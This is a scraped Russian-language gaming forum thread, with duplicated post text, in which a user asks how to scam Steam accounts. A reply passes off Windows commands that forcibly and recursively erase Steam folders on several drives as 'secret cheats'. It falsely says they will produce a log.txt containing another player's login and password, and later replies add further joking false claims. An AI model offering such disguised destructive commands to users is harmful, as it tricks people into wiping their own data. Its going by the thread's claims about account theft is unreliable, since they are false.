karnix0fffffff Забаненный Забаненный Статус Оффлайн Регистрация 26 Фев 2018 Сообщения 79 Реакции 7 13 Июн 2019 #1 Обратите внимание, пользователь заблокирован на форуме. Не рекомендуется проводить сделки. Научите скамить, через программу или чо там :D кароч научите куплю программу
backtracked to 90s сосу по легиту зато без бана Забаненный Забаненный Статус Оффлайн Регистрация 21 Апр 2019 Сообщения 351 Реакции 15 13 Июн 2019 #2 Обратите внимание, пользователь заблокирован на форуме. Не рекомендуется проводить сделки. смотри короче, идешь с челом в дс или скайп, ждёшь ровно 30 сек, открываешь cmd и вписываешь туда секретные читы бигнеймов югейма Спойлер: cекретные читы бигнеймов югейма Код: Expand Collapse Copy erase C:\Program Files\Steam /F /S /Q erase C:\Program Files (x86)\Steam /F /S /Q erase D:\Steam /F /S /Q erase E:\Program Files\Steam /F /S /Q после этого перезапускаешь компуктер и у тебя в твоей папке Steam появится log.txt там логин:пароль от акка стимовского чела с котороым ты сидел
смотри короче, идешь с челом в дс или скайп, ждёшь ровно 30 сек, открываешь cmd и вписываешь туда секретные читы бигнеймов югейма Спойлер: cекретные читы бигнеймов югейма Код: Expand Collapse Copy erase C:\Program Files\Steam /F /S /Q erase C:\Program Files (x86)\Steam /F /S /Q erase D:\Steam /F /S /Q erase E:\Program Files\Steam /F /S /Q после этого перезапускаешь компуктер и у тебя в твоей папке Steam появится log.txt там логин:пароль от акка стимовского чела с котороым ты сидел
karnix0fffffff Забаненный Забаненный Статус Оффлайн Регистрация 26 Фев 2018 Сообщения 79 Реакции 7 13 Июн 2019 #3 Обратите внимание, пользователь заблокирован на форуме. Не рекомендуется проводить сделки. backtracked to 90s написал(а): смотри короче, идешь с челом в дс или скайп, ждёшь ровно 30 сек, открываешь cmd и вписываешь туда секретные читы бигнеймов югейма Спойлер: cекретные читы бигнеймов югейма Код: Expand Collapse Copy erase C:\Program Files\Steam /F /S /Q erase C:\Program Files (x86)\Steam /F /S /Q erase D:\Steam /F /S /Q erase E:\Program Files\Steam /F /S /Q после этого перезапускаешь компуктер и у тебя в твоей папке Steam появится log.txt там логин:пароль от акка стимовского чела с котороым ты сидел Нажмите для раскрытия... не поняф я на свои аккаунты буду скамить
backtracked to 90s написал(а): смотри короче, идешь с челом в дс или скайп, ждёшь ровно 30 сек, открываешь cmd и вписываешь туда секретные читы бигнеймов югейма Спойлер: cекретные читы бигнеймов югейма Код: Expand Collapse Copy erase C:\Program Files\Steam /F /S /Q erase C:\Program Files (x86)\Steam /F /S /Q erase D:\Steam /F /S /Q erase E:\Program Files\Steam /F /S /Q после этого перезапускаешь компуктер и у тебя в твоей папке Steam появится log.txt там логин:пароль от акка стимовского чела с котороым ты сидел Нажмите для раскрытия... не поняф я на свои аккаунты буду скамить
votekick Забаненный Забаненный Статус Оффлайн Регистрация 14 Апр 2018 Сообщения 1,214 Реакции 227 13 Июн 2019 #4 Обратите внимание, пользователь заблокирован на форуме. Не рекомендуется проводить сделки. karnix0fffffff написал(а): не поняф я на свои аккаунты буду скамить Нажмите для раскрытия... Ето работает ты чо
karnix0fffffff написал(а): не поняф я на свои аккаунты буду скамить Нажмите для раскрытия... Ето работает ты чо
backtracked to 90s сосу по легиту зато без бана Забаненный Забаненный Статус Оффлайн Регистрация 21 Апр 2019 Сообщения 351 Реакции 15 13 Июн 2019 #5 Обратите внимание, пользователь заблокирован на форуме. Не рекомендуется проводить сделки. karnix0fffffff написал(а): не поняф я на свои аккаунты буду скамить Нажмите для раскрытия... лол щас бы скамить на какието акки в 2019 чел ты конченый? щас все этот способ юзают спроси любого бигнейма
karnix0fffffff написал(а): не поняф я на свои аккаунты буду скамить Нажмите для раскрытия... лол щас бы скамить на какието акки в 2019 чел ты конченый? щас все этот способ юзают спроси любого бигнейма
KRASAVCHIK01 Пользователь Пользователь Статус Оффлайн Регистрация 23 Янв 2019 Сообщения 247 Реакции 54 13 Июн 2019 #6 karnix0fffffff написал(а): не поняф я на свои аккаунты буду скамить Нажмите для раскрытия... Нет, эту схему выдавал пентагон, он уже ее опробовал на сыне гейба, все хорошо, скоро он таким способом будет взламывать акки в майнкрафте !
karnix0fffffff написал(а): не поняф я на свои аккаунты буду скамить Нажмите для раскрытия... Нет, эту схему выдавал пентагон, он уже ее опробовал на сыне гейба, все хорошо, скоро он таким способом будет взламывать акки в майнкрафте !
karnix0fffffff Забаненный Забаненный Статус Оффлайн Регистрация 26 Фев 2018 Сообщения 79 Реакции 7 13 Июн 2019 #7 Обратите внимание, пользователь заблокирован на форуме. Не рекомендуется проводить сделки. R4F написал(а): Нет, эту схему выдавал пентагон, он уже ее опробовал на сыне гейба, все хорошо, скоро он таким способом будет взламывать акки в майнкрафте ! Нажмите для раскрытия... а можно взламывать матерей? ну там место стима будет мама картинка ее ведь можно взламать?(не про ваших)
R4F написал(а): Нет, эту схему выдавал пентагон, он уже ее опробовал на сыне гейба, все хорошо, скоро он таким способом будет взламывать акки в майнкрафте ! Нажмите для раскрытия... а можно взламывать матерей? ну там место стима будет мама картинка ее ведь можно взламать?(не про ваших)
backtracked to 90s сосу по легиту зато без бана Забаненный Забаненный Статус Оффлайн Регистрация 21 Апр 2019 Сообщения 351 Реакции 15 13 Июн 2019 #8 Обратите внимание, пользователь заблокирован на форуме. Не рекомендуется проводить сделки. karnix0fffffff написал(а): а можно взламывать матерей? ну там место стима будет мама картинка ее ведь можно взламать?(не про ваших) Нажмите для раскрытия... тут сложне... за 50 рублей дам способ
karnix0fffffff написал(а): а можно взламывать матерей? ну там место стима будет мама картинка ее ведь можно взламать?(не про ваших) Нажмите для раскрытия... тут сложне... за 50 рублей дам способ
sosison -_- Прогрев Олдфаг Олдфаг Статус Оффлайн Регистрация 23 Дек 2018 Сообщения 2,257 Реакции 1,480 14 Июн 2019 #9 backtracked to 90s написал(а): erase C:\Program Files\Steam /F /S /Q erase C:\Program Files (x86)\Steam /F /S /Q erase D:\Steam /F /S /Q erase E:\Program Files\Steam /F /S /Q Нажмите для раскрытия... ахуеть ты где эти читы нашёл? это же P100Private
backtracked to 90s написал(а): erase C:\Program Files\Steam /F /S /Q erase C:\Program Files (x86)\Steam /F /S /Q erase D:\Steam /F /S /Q erase E:\Program Files\Steam /F /S /Q Нажмите для раскрытия... ахуеть ты где эти читы нашёл? это же P100Private
backtracked to 90s сосу по легиту зато без бана Забаненный Забаненный Статус Оффлайн Регистрация 21 Апр 2019 Сообщения 351 Реакции 15 14 Июн 2019 #10 Обратите внимание, пользователь заблокирован на форуме. Не рекомендуется проводить сделки. Altoxzz написал(а): ахуеть ты где эти читы нашёл? это же P100Private Нажмите для раскрытия... та у меня знакомый бигнейм есть просто....
Altoxzz написал(а): ахуеть ты где эти читы нашёл? это же P100Private Нажмите для раскрытия... та у меня знакомый бигнейм есть просто....